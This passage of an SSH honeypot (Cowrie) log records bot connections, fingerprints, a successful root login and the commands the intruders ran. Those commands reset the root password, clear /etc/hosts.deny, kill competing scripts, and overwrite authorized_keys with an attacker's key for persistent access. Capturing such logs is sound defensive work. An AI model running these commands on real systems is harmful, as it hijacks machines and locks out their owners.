{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:14:02.054389Z","src_ip":"212.227.125.160","session":"91105a924d52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:02.059855Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:02.382326Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"echo \"root:T33kGQc5f4db\"|chpasswd|bash","message":"CMD: echo \"root:T33kGQc5f4db\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T22:14:02.383185Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:02.385155Z","src_ip":"212.227.125.160","session":"91105a924d52"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:02.563460Z","src_ip":"212.227.235.229","session":"6fba3dac9989"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/aa2b775c30d54bfcc7e30d5206eaa987f18b5eeb90593067e5d42e292c6d8bec","size":21,"shasum":"aa2b775c30d54bfcc7e30d5206eaa987f18b5eeb90593067e5d42e292c6d8bec","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/aa2b775c30d54bfcc7e30d5206eaa987f18b5eeb90593067e5d42e292c6d8bec after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:02.634010Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:03.666387Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T22:14:03.667189Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T22:14:04.867873Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:04.868911Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:05.185800Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T22:14:05.186525Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:05.439250Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:06.116872Z","src_ip":"212.227.235.229","session":"7c7e263a3190"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:06.435647Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T22:14:06.436390Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:07.627750Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:07.933624Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T22:14:07.934323Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T22:14:07.934818Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:08.907302Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53624,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e542b51414f","protocol":"ssh","message":"New connection: 212.227.235.229:53624 (1.2.3.4:22) [session: 6e542b51414f]","sensor":"my-vps","timestamp":"2025-09-08T22:14:09.111484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:09.112424Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:09.218738Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T22:14:09.219433Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:09.296097Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.login.success","username":"root","password":"Liverpool123","message":"login attempt [root/Liverpool123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.073444Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.187508Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:10.464643Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.465344Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:10.515350Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.515974Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.516965Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.702466Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:10.715759Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:11.136762Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.137444Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:11.280993Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.281730Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.323540Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.324451Z","src_ip":"212.227.235.229","session":"6e542b51414f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53626,"dst_ip":"1.2.3.4","dst_port":22,"session":"0575012a1946","protocol":"ssh","message":"New connection: 212.227.235.229:53626 (1.2.3.4:22) [session: 0575012a1946]","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.496399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.497561Z","src_ip":"212.227.235.229","session":"0575012a1946"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.535858Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:11.671498Z","src_ip":"212.227.235.229","session":"0575012a1946"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:12.370766Z","src_ip":"212.227.235.229","session":"0575012a1946"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:12.614535Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:14:12.615465Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56832,"dst_ip":"1.2.3.4","dst_port":22,"session":"a935e959b87f","protocol":"ssh","message":"New connection: 212.227.235.229:56832 (1.2.3.4:22) [session: a935e959b87f]","sensor":"my-vps","timestamp":"2025-09-08T22:14:12.618182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:12.618912Z","src_ip":"212.227.235.229","session":"a935e959b87f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:12.922105Z","src_ip":"212.227.235.229","session":"a935e959b87f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36592,"dst_ip":"1.2.3.4","dst_port":22,"session":"5873c3c0e2fe","protocol":"ssh","message":"New connection: 212.227.235.229:36592 (1.2.3.4:22) [session: 5873c3c0e2fe]","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.324373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.356354Z","src_ip":"212.227.235.229","session":"5873c3c0e2fe"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.547389Z","src_ip":"212.227.235.229","session":"0575012a1946"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.610433Z","src_ip":"212.227.235.229","session":"5873c3c0e2fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53638,"dst_ip":"1.2.3.4","dst_port":22,"session":"08cdfe99746b","protocol":"ssh","message":"New connection: 212.227.235.229:53638 (1.2.3.4:22) [session: 08cdfe99746b]","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.715421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.716284Z","src_ip":"212.227.235.229","session":"08cdfe99746b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:13.811699Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh